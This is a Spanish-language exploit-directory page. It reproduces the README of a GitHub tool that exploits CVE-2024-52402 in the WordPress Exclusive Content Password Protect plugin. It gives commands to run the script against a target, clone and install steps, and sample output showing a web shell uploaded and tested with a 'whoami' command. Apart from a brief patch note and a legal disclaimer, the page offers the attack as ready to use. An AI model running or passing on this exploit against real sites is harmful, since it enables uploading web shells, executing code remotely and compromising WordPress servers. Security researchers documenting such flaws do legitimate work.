Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-52402 — WordPress Exclusive Content Password Protect plugin <= 1.1.0 - Vulnerabilidad de CSRF a Subida Arbitraria de Archivos | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-52402
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubnxploited/cve-2024-52402

CVE-2024-52402

WordPress Exclusive Content Password Protect plugin <= 1.1.0 - Vulnerabilidad de CSRF a Subida Arbitraria de Archivos

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚀 Exploit para CVE-2024-52402: Plugin WordPress Exclusive Content Password Protect <= 1.1.0

🛡️ Resumen

Este exploit apunta a una vulnerabilidad de Cross-Site Request Forgery (CSRF) en el plugin Exclusive Content Password Protect de WordPress, en versiones hasta la 1.1.0 inclusive. Esta vulnerabilidad permite a un atacante subir una web shell al servidor web, lo que puede derivar en la ejecución remota de código.

📅 Detalles

  • Publicado: 2024-11-19
  • ID CVE: CVE-2024-52402
  • Versión del plugin: Exclusive Content Password Protect <= 1.1.0
  • Severidad: CRÍTICA (CVSS 9.6)

⚙️ Uso

Para explotar esta vulnerabilidad, debes proporcionar la URL del sitio WordPress objetivo, un nombre de usuario válido de WordPress y la contraseña. El script de exploit iniciará sesión en el sitio WordPress e intentará subir una web shell.

🔧 Comando

root@kitploit:~
python CVE-2024-52402.py -u <target> -un <username> -p <password>

🛠️ Opciones

root@kitploit:~
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

🌟 Ejemplo

root@kitploit:~
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin

🚀 Ejemplo de salida

root@kitploit:~
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami

📜 Descripción

Este script explota la vulnerabilidad CSRF en el plugin Exclusive Content Password Protect para subir una web shell al servidor WordPress. Sin embargo, no ejecuta un ataque CSRF directamente; en cambio, se centra en aprovechar la funcionalidad de subida de archivos del plugin para lograr la explotación.

👨‍💻 Cómo ejecutar el script

  1. Clonar el repositorio

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52402.git
    cd CVE-2024-52402
    
  2. Instalar los requisitos Asegúrate de tener instalada la librería requests:

    root@kitploit:~
    pip install requests
    
  3. Ejecutar el script Usa el siguiente comando para ejecutar el script:

    root@kitploit:~
    python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
    

🛡️ Mitigación

Para mitigar esta vulnerabilidad, actualiza el plugin Exclusive Content Password Protect a la última versión donde este problema ha sido corregido.

⚠️ Aviso legal

Este script está destinado únicamente a fines educativos. El uso no autorizado de este script contra sistemas para los que no tienes permiso explícito de prueba es ilegal y poco ético.

Exploit By: Nxploit , Khaled alenazi.

Descargar herramienta